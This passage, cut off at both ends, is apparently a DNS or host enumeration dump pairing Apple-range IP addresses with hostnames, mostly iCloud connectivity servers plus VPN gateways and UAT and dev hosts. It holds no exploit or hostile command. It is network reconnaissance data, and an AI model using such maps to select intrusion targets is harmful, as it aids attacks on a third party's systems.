st10215003c.connectivity.icloud.com\n17.167.137.55 st10215004c.connectivity.icloud.com\n17.167.137.56 st10315001c.connectivity.icloud.com\n17.167.137.57 st10315002c.connectivity.icloud.com\n17.167.137.58 st10315003c.connectivity.icloud.com\n17.167.137.59 st10315004c.connectivity.icloud.com\n17.167.137.60 st10415001c.connectivity.icloud.com\n17.167.137.61 st10415002c.connectivity.icloud.com\n17.167.137.62 st10415003c.connectivity.icloud.com\n17.167.137.63 st10415004c.connectivity.icloud.com\n17.167.137.64 st10515001c.connectivity.icloud.com\n17.167.137.65 st10515002c.connectivity.icloud.com\n17.167.137.66 st10515003c.connectivity.icloud.com\n17.167.137.67 st10515004c.connectivity.icloud.com\n17.167.137.68 st10615001c.connectivity.icloud.com\n17.167.137.69 st10615002c.connectivity.icloud.com\n17.167.137.70 st10615003c.connectivity.icloud.com\n17.167.137.71 st10615004c.connectivity.icloud.com\n17.167.137.72 st10715001c.connectivity.icloud.com\n17.167.137.73 st10715002c.connectivity.icloud.com\n17.167.137.74 st10715003c.connectivity.icloud.com\n17.167.137.75 st10715004c.connectivity.icloud.com\n17.167.137.76 st10815001c.connectivity.icloud.com\n17.167.137.77 st10815002c.connectivity.icloud.com\n17.167.137.78 st10815003c.connectivity.icloud.com\n17.167.137.79 st10815004c.connectivity.icloud.com\n17.167.138.54 p17-conduit.connectivity.icloud.com\n17.167.138.55 st10117001c.connectivity.icloud.com\n17.167.138.56 st10117002c.connectivity.icloud.com\n17.167.138.57 st10117003c.connectivity.icloud.com\n17.167.138.58 st10117004c.connectivity.icloud.com\n17.167.138.59 st10217001c.connectivity.icloud.com\n17.167.138.60 st10217002c.connectivity.icloud.com\n17.167.138.61 st10217003c.connectivity.icloud.com\n17.167.138.62 st10217004c.connectivity.icloud.com\n17.167.138.63 st10317001c.connectivity.icloud.com\n17.167.138.64 st10317002c.connectivity.icloud.com\n17.167.138.65 st10317003c.connectivity.icloud.com\n17.167.138.66 st10317004c.connectivity.icloud.com\n17.167.138.67 st10417001c.connectivity.icloud.com\n17.167.138.68 st10417002c.connectivity.icloud.com\n17.167.138.69 st10417003c.connectivity.icloud.com\n17.167.138.70 st10417004c.connectivity.icloud.com\n17.167.138.71 st10517001c.connectivity.icloud.com\n17.167.138.72 st10517002c.connectivity.icloud.com\n17.167.138.73 st10517003c.connectivity.icloud.com\n17.167.138.74 st10517004c.connectivity.icloud.com\n17.167.138.75 st10617001c.connectivity.icloud.com\n17.167.138.76 st10617002c.connectivity.icloud.com\n17.167.138.77 st10617003c.connectivity.icloud.com\n17.167.138.78 st10617004c.connectivity.icloud.com\n17.167.138.79 st10717001c.connectivity.icloud.com\n17.167.138.80 st10717002c.connectivity.icloud.com\n17.167.138.81 st10717003c.connectivity.icloud.com\n17.167.138.82 st10717004c.connectivity.icloud.com\n17.167.138.83 st10817001c.connectivity.icloud.com\n17.167.138.84 st10817002c.connectivity.icloud.com\n17.167.138.85 st10817003c.connectivity.icloud.com\n17.167.138.86 st10817004c.connectivity.icloud.com\n17.167.139.18 p19-conduit.connectivity.icloud.com\n17.167.139.51 st10119001c.connectivity.icloud.com\n17.167.139.52 st10119002c.connectivity.icloud.com\n17.167.139.53 st10119003c.connectivity.icloud.com\n17.167.139.54 st10119004c.connectivity.icloud.com\n17.167.139.55 st10219001c.connectivity.icloud.com\n17.167.139.56 st10219002c.connectivity.icloud.com\n17.167.139.57 st10219003c.connectivity.icloud.com\n17.167.139.58 st10219004c.connectivity.icloud.com\n17.167.139.59 st10319001c.connectivity.icloud.com\n17.167.139.60 st10319002c.connectivity.icloud.com\n17.167.139.61 st10319003c.connectivity.icloud.com\n17.167.139.62 st10319004c.connectivity.icloud.com\n17.167.139.63 st10419001c.connectivity.icloud.com\n17.167.139.64 st10419002c.connectivity.icloud.com\n17.167.139.65 st10419003c.connectivity.icloud.com\n17.167.139.66 st10419004c.connectivity.icloud.com\n17.167.139.67 st10519001c.connectivity.icloud.com\n17.167.139.68 st10519002c.connectivity.icloud.com\n17.167.139.69 st10519003c.connectivity.icloud.com\n17.167.139.70 st10519004c.connectivity.icloud.com\n17.167.139.71 st10619001c.connectivity.icloud.com\n17.167.139.72 st10619002c.connectivity.icloud.com\n17.167.139.73 st10619003c.connectivity.icloud.com\n17.167.139.74 st10619004c.connectivity.icloud.com\n17.167.139.75 st10719001c.connectivity.icloud.com\n17.167.139.76 st10719002c.connectivity.icloud.com\n17.167.139.77 st10719003c.connectivity.icloud.com\n17.167.139.78 st10719004c.connectivity.icloud.com\n17.167.139.79 st10819001c.connectivity.icloud.com\n17.167.139.80 st10819002c.connectivity.icloud.com\n17.167.139.81 st10819003c.connectivity.icloud.com\n17.167.139.82 st10819004c.connectivity.icloud.com\n17.167.140.9 p21-conduit.connectivity.icloud.com\n17.167.140.10 st10221003c.connectivity.icloud.com\n17.167.140.11 st10221004c.connectivity.icloud.com\n17.167.140.12 st10321001c.connectivity.icloud.com\n17.167.140.13 st10321002c.connectivity.icloud.com\n17.167.140.14 st10321003c.connectivity.icloud.com\n17.167.140.15 st10321004c.connectivity.icloud.com\n17.167.140.16 st10421001c.connectivity.icloud.com\n17.167.140.17 st10421002c.connectivity.icloud.com\n17.167.140.18 st10421003c.connectivity.icloud.com\n17.167.140.19 st10421004c.connectivity.icloud.com\n17.167.140.20 st10521001c.connectivity.icloud.com\n17.167.140.21 st10521002c.connectivity.icloud.com\n17.167.140.22 st10521003c.connectivity.icloud.com\n17.167.140.23 st10521004c.connectivity.icloud.com\n17.167.140.24 st10621001c.connectivity.icloud.com\n17.167.140.25 st10621002c.connectivity.icloud.com\n17.167.140.26 st10621003c.connectivity.icloud.com\n17.167.140.27 st10621004c.connectivity.icloud.com\n17.167.140.28 st10721001c.connectivity.icloud.com\n17.167.140.29 st10721002c.connectivity.icloud.com\n17.167.140.30 st10721003c.connectivity.icloud.com\n17.167.140.31 st10721004c.connectivity.icloud.com\n17.167.140.32 st10821001c.connectivity.icloud.com\n17.167.140.33 st10821002c.connectivity.icloud.com\n17.167.140.34 st10821003c.connectivity.icloud.com\n17.167.140.35 st10821004c.connectivity.icloud.com\n17.167.140.36 st10121001c.connectivity.icloud.com\n17.167.140.37 st10121002c.connectivity.icloud.com\n17.167.140.38 st10121003c.connectivity.icloud.com\n17.167.140.39 st10121004c.connectivity.icloud.com\n17.167.140.40 st10221001c.connectivity.icloud.com\n17.167.140.41 st10221002c.connectivity.icloud.com\n17.167.142.9 p23-conduit.connectivity.icloud.com\n17.167.142.40 st10123001c.connectivity.icloud.com\n17.167.142.48 st10123002c.connectivity.icloud.com\n17.167.142.49 st10123003c.connectivity.icloud.com\n17.167.142.50 st10123004c.connectivity.icloud.com\n17.167.142.51 st10223001c.connectivity.icloud.com\n17.167.142.52 st10223002c.connectivity.icloud.com\n17.167.142.53 st10223003c.connectivity.icloud.com\n17.167.142.54 st10223004c.connectivity.icloud.com\n17.167.142.55 st10323001c.connectivity.icloud.com\n17.167.142.56 st10323002c.connectivity.icloud.com\n17.167.142.57 st10323003c.connectivity.icloud.com\n17.167.142.58 st10323004c.connectivity.icloud.com\n17.167.142.59 st10423001c.connectivity.icloud.com\n17.167.142.60 st10423002c.connectivity.icloud.com\n17.167.142.61 st10423003c.connectivity.icloud.com\n17.167.142.62 st10423004c.connectivity.icloud.com\n17.167.142.63 st10523001c.connectivity.icloud.com\n17.167.142.64 st10523002c.connectivity.icloud.com\n17.167.142.65 st10523003c.connectivity.icloud.com\n17.167.142.66 st10523004c.connectivity.icloud.com\n17.167.142.67 st10623001c.connectivity.icloud.com\n17.167.142.68 st10623002c.connectivity.icloud.com\n17.167.142.69 st10623003c.connectivity.icloud.com\n17.167.142.70 st10623004c.connectivity.icloud.com\n17.167.142.71 st10723001c.connectivity.icloud.com\n17.167.142.72 st10723002c.connectivity.icloud.com\n17.167.142.73 st10723003c.connectivity.icloud.com\n17.167.142.74 st10723004c.connectivity.icloud.com\n17.167.142.75 st10823001c.connectivity.icloud.com\n17.167.142.76 st10823002c.connectivity.icloud.com\n17.167.142.77 st10823003c.connectivity.icloud.com\n17.167.142.78 st10823004c.connectivity.icloud.com\n17.167.144.11 p25-btmmconduit.connectivity.icloud.com\n17.167.144.43 st10125001c.connectivity.icloud.com\n17.167.144.44 st10125002c.connectivity.icloud.com\n17.167.144.45 st10125003c.connectivity.icloud.com\n17.167.144.46 st10125004c.connectivity.icloud.com\n17.167.144.47 st10225001c.connectivity.icloud.com\n17.167.144.48 st10225002c.connectivity.icloud.com\n17.167.144.49 st10225003c.connectivity.icloud.com\n17.167.144.50 st10225004c.connectivity.icloud.com\n17.167.144.51 st10325001c.connectivity.icloud.com\n17.167.144.52 st10325002c.connectivity.icloud.com\n17.167.144.53 st10325003c.connectivity.icloud.com\n17.167.144.54 st10325004c.connectivity.icloud.com\n17.167.144.55 st10425001c.connectivity.icloud.com\n17.167.144.56 st10425002c.connectivity.icloud.com\n17.167.144.57 st10425003c.connectivity.icloud.com\n17.167.144.58 st10425004c.connectivity.icloud.com\n17.167.144.59 st10525001c.connectivity.icloud.com\n17.167.144.60 st10525002c.connectivity.icloud.com\n17.167.144.61 st10525003c.connectivity.icloud.com\n17.167.144.62 st10525004c.connectivity.icloud.com\n17.167.144.63 st10625001c.connectivity.icloud.com\n17.167.144.64 st10625002c.connectivity.icloud.com\n17.167.144.65 st10625003c.connectivity.icloud.com\n17.167.144.66 st10625004c.connectivity.icloud.com\n17.167.144.67 st10725001c.connectivity.icloud.com\n17.167.144.68 st10725002c.connectivity.icloud.com\n17.167.144.69 st10725003c.connectivity.icloud.com\n17.167.144.70 st10725004c.connectivity.icloud.com\n17.167.144.71 st10825001c.connectivity.icloud.com\n17.167.144.72 st10825002c.connectivity.icloud.com\n17.167.144.73 st10825003c.connectivity.icloud.com\n17.167.144.74 st10825004c.connectivity.icloud.com\n17.167.224.5 vger.apple.com\n17.167.224.22 pv11p01sa-p01.siri.apple.com\n17.169.88.7 smp-device-lt.apple.com\n17.169.234.27 konaserviceuat.apple.com\n17.169.234.53 volumeitunesprogram-st-b.apple.com\n17.169.235.243 iaprvext-uat3.apple.com\n17.169.235.244 iaprvext-uat.apple.com\n17.169.235.249 iaprvext-uat4.apple.com\n17.169.236.227 rjvit.apple.com\n17.169.236.228 rjvt.apple.com\n17.169.237.237 ats-services-uat.apple.com\n17.169.238.26 nc1-dc2-origin-ext.mobileapp-dev2.apple.com\n17.169.238.28 nc1-dc1-storedev1-origin.apple.com\n17.169.238.29 nc1-dc2-storedev1-origin.apple.com\n17.169.238.36 nc1-dc1-storeqa2-gnvdownload.apple.com\n17.169.238.37 nc1-dc2-storeqa2-gnvdownload.apple.com\n17.169.238.38 nc1-dc1-origin-ext.mobileapp-dev1.apple.com\n17.169.238.42 nc1-dc2-origin-ext.mobileapp-dev1.apple.com\n17.169.238.47 nc1-dc1-origin-ext.mobileapp-dev3.apple.com\n17.169.238.48 nc1-dc2-origin-ext.mobileapp-dev3.apple.com\n17.169.238.49 nc1-dc1-origin-ext.mobileapp-dev2.apple.com\n17.169.238.56 sq-device-it2.apple.com\n17.169.238.59 deviceservices-external-it.apple.com\n17.169.238.60 deviceservices-external-ut.apple.com\n17.169.238.61 deviceservices-external-maint.apple.com\n17.171.1.201 mdn-bz-dcvpn.apple.com\n17.171.1.202 st1-02-13-bz-dcvpn-asa2.apple.com\n17.171.1.203 mdn-dcvpn3p.apple.com\n17.171.1.204 st1-02-14-03-bz-dcvpn-asa4.apple.com\n17.171.1.251 ivpn-mdn.apple.com\n17.171.1.253 idcvpn-mdn.apple.com\n17.171.1.254 mdn-bz-3pvpn.apple.com\n17.171.2.16 mdn-rover-ember01.apple.com\n17.171.2.17 mdn-rover-ember02.apple.com\n17.171.2.18 mdn-rover-ember03.apple.com\n17.171.2.66 pinova.apple.com\n17.171.11.252 verify-nc.apple.com\n17.171.12.218 rsvp-t-new.apple.com\n17.171.12.236 privftpuat.apple.com\n17.171.13.17 vlt-ehla-uat.apple.com\n17.171.13.236 itntrvlt-new.apple.com\n17.171.13.238 rsvp-at.apple.com\n17.171.13.239 rsvp-t.apple.com\n17.171.13.252 webgdvtws.apple.com\n17.171.13.253 webgdvitws.apple.com\n17.171.22.11 nc-geneva-upload.apple.com\n17.171.22.12 nc-geneva-download.apple.com\n17.171.24.32 sq-device-stage.apple.com\n17.171.26.252 nc1-carrier-services.apple.com\n17.171.26.253 nc2-carrier-services.apple.com\n17.171.27.85 nc1-ips-device-external.apple.com\n17.171.40.12 fdeserver-md.apple.com\n17.171.40.21 volumeitunesprogram-b.apple.com\n17.171.63.30 nserver5.apple.com\n17.171.63.40 nserver6.apple.com\n17.171.67.31 appletravel-us.apple.com\n17.171.69.20 jointventure-mdn.apple.com\n17.171.71.74 reserve.apple.com\n17.171.73.138 livetest.mobileapp.apple.com\n17.172.28.16 st11p01ad-approval.apple.com\n17.172.28.216 vg3-dev1ad.iad.apple.com\n17.172.28.217 vg3-dev1oo.iad.apple.com\n17.172.28.218 vg3-dev1cprad.iad.apple.com\n17.172.28.219 vg3-dev1cprcontent.iad.apple.com\n17.172.28.220 vg3-dev1cprfeed.iad.apple.com\n17.172.28.221 vg3-dev1cpr.iad.apple.com\n17.172.28.222 vg3-dev2ad.iad.apple.com\n17.172.28.223 vg3-dev2oo.iad.apple.com\n17.172.28.224 vg3-dev2cprad.iad.apple.com\n17.172.28.225 vg3-dev2cprcontent.iad.apple.com\n17.172.28.226 vg3-dev2cprfeed.iad.apple.com\n17.172.28.227 vg3-dev2cpr.iad.apple.com\n17.172.28.230 vg3-dev3ad.iad.apple.com\n17.172.28.231 vg3-dev3oo.iad.apple.com\n17.172.28.232 vg3-dev3cprad.iad.apple.com\n17.172.28.233 vg3-dev3cprcontent.iad.apple.com\n17.172.28.234 vg3-dev3cprfeed.iad.apple.com\n17.172.28.235 vg3-dev3cpr.iad.apple.com\n17.172.34.23 hblrcvrweb.icloud.com\n17.172.62.5 st10001001.connectivity.icloud.com\n17.172.62.6 st10101001.connectivity.icloud.com\n17.172.62.7 st10201001.connectivity.icloud.com\n17.172.62.8 st10301001.connectivity.icloud.com\n17.172.62.9 st10401001.connectivity.icloud.com\n17.172.62.10 st10501001.connectivity.icloud.com\n17.172.62.11 st10601001.connectivity.icloud.com\n17.172.62.12 st10701001.connectivity.icloud.com\n17.172.62.13 st10001002.connectivity.icloud.com\n17.172.62.14 st10101002.connectivity.icloud.com\n17.172.62.15 st10201002.connectivity.icloud.com\n17.172.62.16 st10301002.connectivity.icloud.com\n17.172.62.17 st10401002.connectivity.icloud.com\n17.172.62.18 st10501002.connectivity.icloud.com\n17.172.62.19 st10601002.connectivity.icloud.com\n17.172.62.20 st10701002.connectivity.icloud.com\n17.172.62.21 st10001003.connectivity.icloud.com\n17.172.62.22 st10101003.connectivity.icloud.com\n17.172.62.23 st10201003.connectivity.icloud.com\n17.172.62.24 st10301003.connectivity.icloud.com\n17.172.62.25 st10401003.connectivity.icloud.com\n17.172.62.26 st10501003.connectivity.icloud.com\n17.172.62.27 st10601003.connectivity.icloud.com\n17.172.62.28 st10701003.connectivity.icloud.com\n17.172.62.29 st10002004.connectivity.icloud.com\n17.172.62.30 st10102004.connectivity.icloud.com\n17.172.62.31 st10202004.connectivity.icloud.com\n17.172.62.32 st10302004.connectivity.icloud.com\n17.172.62.33 st10402004.connectivity.icloud.com\n17.172.62.34 st10502004.connectivity.icloud.com\n17.172.62.35 st10602004.connectivity.icloud.com\n17.172.62.36 st10702004.connectivity.icloud.com\n17.172.62.37 st10002005.connectivity.icloud.com\n17.172.62.38 st10102005.connectivity.icloud.com\n17.172.62.39 st10202005.connectivity.icloud.com\n17.172.62.40 st10302005.connectivity.icloud.com\n17.172.62.41 st10402005.connectivity.icloud.com\n17.172.62.42 st10502005.connectivity.icloud.com\n17.172.62.43 st10602005.connectivity.icloud.com\n17.172.62.44 st10702005.connectivity.icloud.com\n17.172.62.45 st10002006.connectivity.icloud.com\n17.172.62.46 st10102006.connectivity.icloud.com\n17.172.62.47 st10202006.connectivity.icloud.com\n17.172.62.48 st10302006.connectivity.icloud.com\n17.172.62.49 st10402006.connectivity.icloud.com\n17.172.62.50 st10502006.connectivity.icloud.com\n17.172.62.51 st10602006.connectivity.icloud.com\n17.172.62.52 st10702006.connectivity.icloud.com\n17.172.62.53 st10003007.connectivity.icloud.com\n17.172.62.54 st10103007.connectivity.icloud.com\n17.172.62.55 st10203007.connectivity.icloud.com\n17.172.62.56 st10303007.connectivity.icloud.com\n17.172.62.57 st10403007.connectivity.icloud.com\n17.172.62.58 st10503007.connectivity.icloud.com\n17.172.62.59 st10603007.connectivity.icloud.com\n17.172.62.60 st10703007.connectivity.icloud.com\n17.172.62.61 st10003008.connectivity.icloud.com\n17.172.62.62 st10103008.connectivity.icloud.com\n17.172.62.63 st10203008.connectivity.icloud.com\n17.172.62.64 st10303008.connectivity.icloud.com\n17.172.62.65 st10403008.connectivity.icloud.com\n17.172.62.66 st10503008.connectivity.icloud.com\n17.172.62.67 st10603008.connectivity.icloud.com\n17.172.62.68 st10703008.connectivity.icloud.com\n17.172.62.69 st10003009.connectivity.icloud.com\n17.172.62.70 st10103009.connectivity.icloud.com\n17.172.62.71 st10203009.connectivity.icloud.com\n17.172.62.72 st10303009.connectivity.icloud.com\n17.172.62.73 st10403009.connectivity.icloud.com\n17.172.62.74 st10503009.connectivity.icloud.com\n17.172.62.75 st10603009.connectivity.icloud.com\n17.172.62.76 st10703009.connectivity.icloud.com\n17.172.62.77 st10004010.connectivity.icloud.com\n17.172.62.78 st10104010.connectivity.icloud.com\n17.172.62.79 st10204010.connectivity.icloud.com\n17.172.62.80 st10304010.connectivity.icloud.com\n17.172.62.81 st10404010.connectivity.icloud.com\n17.172.62.82 st10504010.connectivity.icloud.com\n17.172.62.83 st10604010.connectivity.icloud.com\n17.172.62.84 st10704010.connectivity.icloud.com\n17.172.62.85 st10004011.connectivity.icloud.com\n17.172.62.86 st10104011.connectivity.icloud.com\n17.172.62.87 st10204011.connectivity.icloud.com\n17.172.62.88 st10304011.connectivity.icloud.com\n17.172.62.89 st10404011.connectivity.icloud.com\n17.172.62.90 st10504011.connectivity.icloud.com\n17.172.62.91 st10604011.connectivity.icloud.com\n17.172.62.92 st10704011.connectivity.icloud.com\n17.172.62.93 st10004012.connectivity.icloud.com\n17.172.62.94 st10104012.connectivity.icloud.com\n17.172.62.95 st10204012.connectivity.icloud.com\n17.172.62.96 st10304012.connectivity.icloud.com\n17.172.62.97 st10404012.connectivity.icloud.com\n17.172.62.98 st10504012.connectivity.icloud.com\n17.172.62.99 st10604012.connectivity.icloud.com\n17.172.62.100 st10704012.connectivity.icloud.com\n17.172.62.133 st10005018.connectivity.icloud.com\n17.172.62.134 st10105018.connectivity.icloud.com\n17.172.62.135 st10205018.connectivity.icloud.com\n17.172.62.136 st10305018.connectivity.icloud.com\n17.172.62.137 st10405018.connectivity.icloud.com\n17.172.62.138 st10505018.connectivity.icloud.com\n17.172.62.139 st10605018.connectivity.icloud.com\n17.172.62.140 st10705018.connectivity.icloud.com\n17.172.62.141 st10005017.connectivity.icloud.com\n17.172.62.142 st10105017.connectivity.icloud.com\n17.172.62.143 st10205017.connectivity.icloud.com\n17.172.62.144 st10305017.connectivity.icloud.com\n17.172.62.145 st10405017.connectivity.icloud.com\n17.172.62.146 st10505017.connectivity.icloud.com\n17.172.62.147 st10605017.connectivity.icloud.com\n17.172.62.148 st10705017.connectivity.icloud.com\n17.172.62.149 st10005019.connectivity.icloud.com\n17.172.62.150 st10105019.connectivity.icloud.com\n17.172.62.151 st10205019.connectivity.icloud.com\n17.172.62.152 st10305019.connectivity.icloud.com\n17.172.62.153 st10405019.connectivity.icloud.com\n17.172.62.154 st10505019.connectivity.icloud.com\n17.172.62.155 st10605019.connectivity.icloud.com\n17.172.62.156 st10705019.connectivity.icloud.com\n17.172.62.157 st10006020.connectivity.icloud.com\n17.172.62.158 st10106020.connectivity.icloud.com\n17.172.62.159 st10206020.connectivity.icloud.com\n17.172.62.160 st10306020.connectivity.icloud.com\n17.172.62.161 st10406020.connectivity.icloud.com\n17.172.62.162 st10506020.connectivity.icloud.com\n17.172.62.163 st10606020.connectivity.icloud.com\n17.172.62.164 st10706020.connectivity.icloud.com\n17.172.62.165 st10006021.connectivity.icloud.com\n17.172.62.166 st10106021.connectivity.icloud.com\n17.172.62.167 st10206021.connectivity.icloud.com\n17.172.62.168 st10306021.connectivity.icloud.com\n17.172.62.169 st10406021.connectivity.icloud.com\n17.172.62.170 st10506021.connectivity.icloud.com\n17.172.62.171 st10606021.connectivity.icloud.com\n17.172.62.172 st10706021.connectivity.icloud.com\n17.172.62.173 st10006022.connectivity.icloud.com\n17.172.62.174 st10106022.connectivity.icloud.com\n17.172.62.175 st10206022.connectivity.icloud.com\n17.172.62.176 st10306022.connectivity.icloud.com\n17.172.62.177 st10406022.connectivity.icloud.com\n17.172.62.178 st10506022.connectivity.icloud.com\n17.172.62.179 st10606022.connectivity.icloud.com\n17.172.62.180 st10706022.connectivity.icloud.com\n17.172.62.181 st10007023.connectivity.icloud.com\n17.172.62.182 st10107023.connectivity.icloud.com\n17.172.62.183 st10207023.connectivity.icloud.com\n17.172.62.184 st10307023.connectivity.icloud.com\n17.172.62.185 st10407023.connectivity.icloud.com\n17.172.62.186 st10507023.connectivity.icloud.com\n17.172.62.187 st10607023.connectivity.icloud.com\n17.172.62.188 st10707023.connectivity.icloud.com\n17.172.62.189 st10007024.connectivity.icloud.com\n17.172.62.190 st10107024.connectivity.icloud.com\n17.172.62.191 st10207024.connectivity.icloud.com\n17.172.62.192 st10307024.connectivity.icloud.com\n17.172.62.193 st10407024.connectivity.icloud.com\n17.172.62.194 st10507024.connectivity.icloud.com\n17.172.62.195 st10607024.connectivity.icloud.com\n17.172.62.196 st10707024.connectivity.icloud.com\n17.172.62.197 st10007025.connectivity.icloud.com\n17.172.62.198 st10107025.connectivity.icloud.com\n17.172.62.199 st10207025.connectivity.icloud.com\n17.172.62.200 st10307025.connectivity.icloud.com\n17.172.62.201 st10407025.connectivity.icloud.com\n17.172.62.202 st10507025.connectivity.icloud.com\n17.172.62.203 st10607025.connectivity.icloud.com\n17.172.62.204 st10707025.connectivity.icloud.com\n17.172.62.205 st10008026.connectivity.icloud.com\n17.172.62.206 st10108026.connectivity.icloud.com\n17.172.62.207 st10208026.connectivity.icloud.com\n17.172.62.208 st10308026.connectivity.icloud.com\n17.172.62.209 st10408026.connectivity.icloud.com\n17.172.62.210 st10508026.connectivity.icloud.com\n17.172.62.211 st10608026.connectivity.icloud.com\n17.172.62.212 st10708026.connectivity.icloud.com\n17.172.62.213 st10008027.connectivity.icloud.com\n17.172.62.214 st10108027.connectivity.icloud.com\n17.172.62.215 st10208027.connectivity.icloud.com\n17.172.62.216 st10308027.connectivity.icloud.com\n17.172.62.217 st10408027.connectivity.icloud.com\n17.172.62.218 st10508027.connectivity.icloud.com\n17.172.62.219 st10608027.connectivity.icloud.com\n17.172.62.220 st10708027.connectivity.icloud.com\n17.172.62.221 st10008028.connectivity.icloud.com\n17.172.62.222 st10108028.connectivity.icloud.com\n17.172.62.223 st10208028.connectivity.icloud.com\n17.172.62.224 st10308028.connectivity.icloud.com\n17.172.62.225 st10408028.connectivity.icloud.com\n17.172.62.226 st10508028.connectivity.icloud.com\n17.172.62.227 st10608028.connectivity.icloud.com\n17.172.62.228 st10708028.connectivity.icloud.com\n17.172.62.229 st10009029.connectivity.icloud.com\n17.172.62.230 st10109029.connectivity.icloud.com\n17.172.62.231 st10209029.connectivity.icloud.com\n17.172.62.232 st10309029.connectivity.icloud.com\n17.172.62.233 st10409029.connectivity.icloud.com\n17.172.62.234 st10509029.connectivity.icloud.com\n17.172.62.235 st10609029.connectivity.icloud.com\n17.172.62.236 st10709029.connectivity.icloud.com\n17.172.62.237 st10009030.connectivity.icloud.com\n17.172.62.238 st10109030.connectivity.icloud.com\n17.172.62.239 st10209030.connectivity.icloud.com\n17.172.62.240 st10309030.connectivity.icloud.com\n17.172.62.241 st10409030.connectivity.icloud.com\n17.172.62.242 st10509030.connectivity.icloud.com\n17.172.62.243 st10609030.connectivity.icloud.com\n17.172.62.244 st10709030.connectivity.icloud.com\n17.172.62.245 st10009031.connectivity.icloud.com\n17.172.62.246 st10109031.connectivity.icloud.com\n17.172.62.247 st10209031.connectivity.icloud.com\n17.172.62.248 st10309031.connectivity.icloud.com\n17.172.62.249 st10409031.connectivity.icloud.com\n17.172.62.250 st10509031.connectivity.icloud.com\n17.172.62.251 st10609031.connectivity.icloud.com\n17.172.62.252 st10709031.connectivity.icloud.com\n17.172.62.253 st10010032.connectivity.icloud.com\n17.172.62.254 st10110032.connectivity.icloud.com\n17.172.62.255 st10210032.connectivity.icloud.com\n17.172.63.0 st10310032.connectivity.icloud.com\n17.172.63.1 st10410032.connectivity.icloud.com\n17.172.63.2 st10510032.connectivity.icloud.com\n17.172.63.3 st10610032.connectivity.icloud.com\n17.172.63.4 st10710032.connectivity.icloud.com\n17.172.63.5 st10010033.connectivity.icloud.com\n17.172.63.6 st10110033.connectivity.icloud.com\n17.172.63.7 st10210033.connectivity.icloud.com\n17.172.63.8 st10310033.connectivity.icloud.com\n17.172.63.9 st10410033.connectivity.icloud.com\n17.172.63.10 st10510033.connectivity.icloud.com\n17.172.63.11 st10610033.connectivity.icloud.com\n17.172.63.12 st10710033.connectivity.icloud.com\n17.172.63.13 st10010034.connectivity.icloud.com\n17.172.63.14 st10110034.connectivity.icloud.com\n17.172.63.15 st10210034.connectivity.icloud.com\n17.172.63.16 st10310034.connectivity.icloud.com\n17.172.63.17 st10410034.connectivity.icloud.com\n17.172.63.18 st10510034.connectivity.icloud.com\n17.172.63.19 st10610034.connectivity.icloud.com\n17.172.63.20 st10710034.connectivity.icloud.com\n17.172.100.41 st10305001c.connectivity.icloud.com\n17.172.100.57 st10705001c.connectivity.icloud.com\n17.172.100.64 st10605001c.connectivity.icloud.com\n17.172.100.65 st10205001c.connectivity.icloud.com\n17.172.100.67 st10405001c.connectivity.icloud.com\n17.172.100.81 st10805001c.connectivity.icloud.com\n17.172.100.82 st10505001c.connectivity.icloud.com\n17.172.100.83 st10105001c.connectivity.icloud.com\n17.172.100.84 p05-conduit.connectivity.icloud.com\n17.172.100.85 st10305002c.connectivity.icloud.com\n17.172.100.86 st10705002c.connectivity.icloud.com\n17.172.100.87 st10605002c.connectivity.icloud.com\n17.172.100.88 st10205002c.connectivity.icloud.com\n17.172.100.89 st10405002c.connectivity.icloud.com\n17.172.100.90 st10805002c.connectivity.icloud.com\n17.172.100.91 st10505002c.connectivity.icloud.com\n17.172.100.92 st10105002c.connectivity.icloud.com\n17.172.100.97 st10305003c.connectivity.icloud.com\n17.172.100.98 st10705003c.connectivity.icloud.com\n17.172.100.99 st10605003c.connectivity.icloud.com\n17.172.100.100 st10205003c.connectivity.icloud.com\n17.172.100.101 st10405003c.connectivity.icloud.com\n17.172.100.102 st10805003c.connectivity.icloud.com\n17.172.100.103 st10505003c.connectivity.icloud.com\n17.172.100.104 st10105003c.connectivity.icloud.com\n17.172.100.105 st10305004c.connectivity.icloud.com\n17.172.100.106 st10705004c.connectivity.icloud.com\n17.172.100.107 st10605004c.connectivity.icloud.com\n17.172.100.108 st10205004c.connectivity.icloud.com\n17.172.100.109 st10405004c.connectivity.icloud.com\n17.172.100.110 st10805004c.connectivity.icloud.com\n17.172.100.111 st10505004c.connectivity.icloud.com\n17.172.100.112 st10105004c.connectivity.icloud.com\n17.172.116.38 st10306001c.connectivity.icloud.com\n17.172.116.44 st10706001c.connectivity.icloud.com\n17.172.116.58 st10606001c.connectivity.icloud.com\n17.172.116.59 st10206001c.connectivity.icloud.com\n17.172.116.81 st10406001c.connectivity.icloud.com\n17.172.116.82 st10806001c.connectivity.icloud.com\n17.172.116.83 st10506001c.connectivity.icloud.com\n17.172.116.84 st10106001c.connectivity.icloud.com\n17.172.116.85 p06-conduit.connectivity.icloud.com\n17.172.116.86 st10306002c.connectivity.icloud.com\n17.172.116.87 st10706002c.connectivity.icloud.com\n17.172.116.88 st10606002c.connectivity.icloud.com\n17.172.116.89 st10206002c.connectivity.icloud.com\n17.172.116.90 st10406002c.connectivity.icloud.com\n17.172.116.91 st10806002c.connectivity.icloud.com\n17.172.116.92 st10506002c.connectivity.icloud.com\n17.172.116.93 st10106002c.connectivity.icloud.com\n17.172.116.98 st10306003c.connectivity.icloud.com\n17.172.116.99 st10706003c.connectivity.icloud.com\n17.172.116.100 st10606003c.connectivity.icloud.com\n17.172.116.101 st10206003c.connectivity.icloud.com\n17.172.116.102 st10406003c.connectivity.icloud.com\n17.172.116.103 st10806003c.connectivity.icloud.com\n17.172.116.104 st10506003c.connectivity.icloud.com\n17.172.116.105 st10106003c.connectivity.icloud.com\n17.172.116.106 st10306004c.connectivity.icloud.com\n17.172.116.107 st10706004c.connectivity.icloud.com\n17.172.116.108 st10606004c.connectivity.icloud.com\n17.172.116.109 st10206004c.connectivity.icloud.com\n17.172.116.110 st10406004c.connectivity.icloud.com\n17.172.116.111 st10806004c.connectivity.icloud.com\n17.172.116.112 st10506004c.connectivity.icloud.com\n17.172.116.113 st10106004c.connectivity.icloud.com\n17.172.190.141 vgr301.apple.com\n17.172.190.142 vgr302.apple.com\n17.172.190.143 vgr303.apple.com\n17.172.190.144 vgr304.apple.com\n17.172.190.145 vgr305.apple.com\n17.172.190.146 vgr306.apple.com\n17.172.190.147 vgr307.apple.com\n17.172.190.148 vgr308.apple.com\n17.172.192.57 st10301001c.connectivity.icloud.com\n17.172.192.58 st10701001c.connectivity.icloud.com\n17.172.192.59 st10601001c.connectivity.icloud.com\n17.172.192.60 